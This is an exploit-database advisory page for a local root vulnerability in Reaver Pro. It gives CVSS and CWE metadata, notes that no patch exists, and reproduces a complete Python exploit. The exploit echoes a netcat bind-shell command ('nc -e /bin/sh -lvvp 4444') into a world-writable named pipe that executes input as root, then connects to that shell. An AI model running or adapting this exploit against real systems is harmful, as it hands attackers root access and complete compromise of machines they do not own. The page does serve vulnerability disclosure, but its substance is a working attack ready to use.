Reaver Pro Local Root

vendor:

Reaver Pro

by:

Insecurety Research

7,2

CVSS

HIGH

Local Privilege Escalation

264

CWE

Product Name: Reaver Pro

Affected Version From: Reaver Pro

Affected Version To: Reaver Pro

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2012

Reaver Pro is prone to a local privilege-escalation vulnerability. A local attacker may exploit this issue to execute arbitrary code with root privileges. Successful exploits may result in the complete compromise of affected computers. The exploit code creates a bindshell on port 4444 and connects to it.

Mitigation:

No known mitigation or remediation is available for this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/55725/info

Reaver Pro is prone to a local privilege-escalation vulnerability.

A local attacker may exploit this issue to execute arbitrary code with root privileges. Successful exploits may result in the complete compromise of affected computers. 

#!/usr/bin/env python
import os
print """
          Reaver Pro Local Root
   Exploits a hilarious named pipe flaw.
The named pipe /tmp/exe is open to anyone...
Any command echoed into it gets ran as root.
This simply launches a bindshell on 4444...
    Insecurety Research | insecurety.net
"""
print ""
print "This is why TacNetSol should hire me?"
print "[+] Sending command to named pipe..."
cmd = '''echo "nc -e /bin/sh -lvvp 4444" >> /tmp/exe'''
os.system(cmd)
print "[+] Connecting to bind shell, enjoy root!"
os.system("nc -v localhost 4444")